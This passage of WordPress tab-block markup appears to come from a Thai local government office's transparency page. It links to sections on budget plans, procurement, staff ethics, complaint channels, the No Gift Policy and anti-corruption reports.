ินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_8bd340-cd\",\"color\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_8bd340-cd kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_eb7e47-e1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb7e47-e1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=780\" data-type=\"page\" data-id=\"780\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cdf90d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cdf90d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=824\">แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_948636-84\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_948636-84 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_3edff3-bb\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_3edff3-bb\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=840\" data-type=\"page\" data-id=\"840\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9ab5d8-54\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9ab5d8-54\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b37671-e5\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b37671-e5\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_317e6f-33\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_317e6f-33\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=855\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_37f8e2-2d\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_37f8e2-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_12bed0-a6\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_12bed0-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_7e4f7d-a0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_7e4f7d-a0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\">รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_4e465f-3b\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_4e465f-3b\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=851\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9028d2-dc\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9028d2-dc\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"900\">การขับเคลื่อนจริยธรรม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_363bba-05\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_363bba-05 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_c0e085-63\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_c0e085-63\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_29fead-8e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_29fead-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_98736b-ac\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_98736b-ac\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=831\">รายงานผลตามนโยบาย No Gift Policy</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_61f4d2-80\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_61f4d2-80\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_67b463-61\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_67b463-61\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_9c9020-fa\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_9c9020-fa\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_c6c267-89\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_c6c267-89 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_64d6b5-67\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_64d6b5-67\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_106c4d-48\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_106c4d-48\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f729cb-3e\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f729cb-3e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 